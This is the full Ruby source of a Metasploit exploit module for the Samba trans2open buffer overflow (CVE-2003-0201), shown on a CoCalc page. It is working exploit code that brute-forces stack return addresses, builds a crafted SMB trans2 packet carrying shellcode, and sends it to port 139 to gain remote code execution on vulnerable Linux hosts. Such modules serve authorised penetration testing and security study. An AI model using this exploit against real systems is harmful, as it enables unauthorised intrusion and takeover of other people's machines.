CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!

1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6
class MetasploitModule < Msf::Exploit::Remote
7
  Rank = GreatRanking
8

9
  include Msf::Exploit::Remote::SMB::Client
10
  include Msf::Exploit::Brute
11

12
  def initialize(info = {})
13
    super(update_info(info,
14
      'Name'           => 'Samba trans2open Overflow (Linux x86)',
15
      'Description'    => %q{
16
          This exploits the buffer overflow found in Samba versions
17
        2.2.0 to 2.2.8. This particular module is capable of
18
        exploiting the flaw on x86 Linux systems that do not
19
        have the noexec stack option set.
20

21
        NOTE: Some older versions of RedHat do not seem to be vulnerable
22
        since they apparently do not allow anonymous access to IPC.
23
      },
24
      'Author'         => [ 'hdm', 'jduck' ],
25
      'License'        => MSF_LICENSE,
26
      'References'     =>
27
        [
28
          [ 'CVE', '2003-0201' ],
29
          [ 'OSVDB', '4469' ],
30
          [ 'BID', '7294' ],
31
          [ 'URL', 'https://seclists.org/bugtraq/2003/Apr/103' ]
32
        ],
33
      'Privileged'     => true,
34
      'Payload'        =>
35
        {
36
          'Space'    => 1024,
37
          'BadChars' => "\x00",
38
          'MinNops'  => 512,
39
          'StackAdjustment' => -3500
40
        },
41
      'Platform'       => 'linux',
42
      'Targets'        =>
43
        [
44
          # tested OK - jjd:
45
          # RedHat 7.2 samba-2.2.1a-4 - 0xbffffafc
46
          # RedHat 9.0 samba-2.2.7a-7.9.0 - 0xbfffddfc
47
          [ 'Samba 2.2.x - Bruteforce',
48
            {
49
              'PtrToNonZero' => 0xbffffff4, # near the bottom of the stack
50
              'Offset'       => 1055,
51
              'Bruteforce'   =>
52
                {
53
                  'Start' => { 'Ret' => 0xbffffdfc },
54
                  'Stop'  => { 'Ret' => 0xbfa00000 },
55
                  'Step'  => 256
56
                }
57
            }
58
          ],
59
        ],
60
      'DefaultTarget'  => 0,
61
      'DisclosureDate' => '2003-04-07'
62
      ))
63

64
    register_options(
65
      [
66
        Opt::RPORT(139)
67
      ])
68

69
    deregister_options('SMB::ProtocolVersion')
70
  end
71

72
  def brute_exploit(addrs)
73

74
    curr_ret = addrs['Ret']
75
    begin
76
      print_status("Trying return address 0x%.8x..." %  curr_ret)
77

78
      vprint_status('Connect with SMB1 since it needs native_lm info')
79
      connect(versions: [1])
80
      smb_login
81

82
      if ! @checked_peerlm
83
        if smb_peer_lm !~ /samba/i
84
          fail_with(Failure::NoTarget, "This target is not a Samba server (#{smb_peer_lm}")
85
        end
86

87
        if smb_peer_lm =~ /Samba [34]\./i
88
          fail_with(Failure::NoTarget, "This target is not a vulnerable Samba server (#{smb_peer_lm})")
89
        end
90
      end
91

92
      @checked_peerlm = true
93

94

95
      # This value *must* be 1988 to allow findrecv shellcode to work
96
      # XXX: I'm not sure the above comment is true...
97
      pattern = rand_text_english(1988)
98

99
      # See the OSX and Solaris versions of this module for additional
100
      # information.
101

102
      # eip_off = 1071 - RH7.2 compiled with -ggdb instead of -O/-O2
103
      # (rpmbuild -bp ; edited/reran config.status ; make)
104
      eip_off = target['Offset']
105
      ptr_to_non_zero = target['PtrToNonZero']
106

107
      # Stuff the shellcode into the request
108
      pattern[0, payload.encoded.length] = payload.encoded
109

110
      # We want test true here, so we overwrite conn with a pointer
111
      # to something non-zero.
112
      #
113
      # 222       if (IS_IPC(conn)) {
114
      # 223          return(ERROR(ERRSRV,ERRaccess));
115
      # 224       }
116
      pattern[eip_off + 4, 4] = [ptr_to_non_zero - 0x30].pack('V')
117

118
      # We want to avoid crashing on the following two derefences.
119
      #
120
      # 116     int error_packet(char *inbuf,char *outbuf,int error_class,uint32 error_code,int line)
121
      # 117     {
122
      # 118       int outsize = set_message(outbuf,0,0,True);
123
      # 119       int cmd = CVAL(inbuf,smb_com);
124
      pattern[eip_off + 8, 4] = [ptr_to_non_zero - 0x08].pack('V')
125
      pattern[eip_off + 12, 4] = [ptr_to_non_zero - 0x24].pack('V')
126

127
      # This stream covers the framepointer and the return address
128
      #pattern[1199, 400] = [curr_ret].pack('N') * 100
129
      pattern[eip_off, 4] = [curr_ret].pack('V')
130

131
      trans =
132
        "\x00\x04\x08\x20\xff\x53\x4d\x42\x32\x00\x00\x00\x00\x00\x00\x00"+
133
        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00"+
134
        "\x64\x00\x00\x00\x00\xd0\x07\x0c\x00\xd0\x07\x0c\x00\x00\x00\x00"+
135
        "\x00\x00\x00\x00\x00\x00\x00\xd0\x07\x43\x00\x0c\x00\x14\x08\x01"+
136
        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"+
137
        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x90"+
138
        pattern
139

140
      # puts "press any key"; $stdin.gets
141

142
      sock.put(trans)
143
      handler
144

145
    rescue ::EOFError
146
    rescue ::Rex::Proto::SMB::Exceptions::LoginError, ::Interrupt, ::RuntimeError
147
      raise $!
148
    rescue ::Exception => e
149
      print_error("#{rhost} #{e}")
150
    end
151

152
    handler
153
    disconnect
154

155
  end
156
end
157

158